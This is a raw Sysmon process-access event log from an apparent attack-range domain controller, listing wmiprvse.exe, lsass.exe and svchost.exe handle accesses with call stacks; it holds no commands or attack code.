RPCRT4.dll+1ae1c 10341000x800000000000000025854Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDE-60D3-1600-00000000CF01}1292C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025853Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDD-60D3-1500-00000000CF01}1256C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025852Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDD-60D3-1400-00000000CF01}1056C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025851Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDD-60D3-1300-00000000CF01}760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025850Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDD-60D3-1200-00000000CF01}416C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025849Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.691{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDD-60D3-1100-00000000CF01}436C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025848Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.691{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDD-60D3-1000-00000000CF01}104C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025847Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.691{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDD-60D3-0F00-00000000CF01}312C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025846Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.691{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDD-60D3-0E00-00000000CF01}1004C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025845Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.691{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDD-60D3-0D00-00000000CF01}904C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025844Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.691{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDD-60D3-0C00-00000000CF01}844C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025843Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.691{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025842Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.691{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDB-60D3-0900-00000000CF01}568C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025841Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.691{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A346-60D3-6506-00000000CF01}6532C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025840Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.691{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A346-60D3-6506-00000000CF01}6532C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025839Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.660{4DB9351A-9DDE-60D3-1600-00000000CF01}12925648C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6506-00000000CF01}6532C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+2685b|C:\Windows\system32\wbem\wbemcore.dll+22b78|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025838Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.629{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6506-00000000CF01}6532C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000025837Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.582{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A346-60D3-6506-00000000CF01}6532C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025836Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.582{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6506-00000000CF01}6532C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025835Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.566{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025834Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.566{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025833Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.566{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-9DDE-60D3-1600-00000000CF01}1292C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.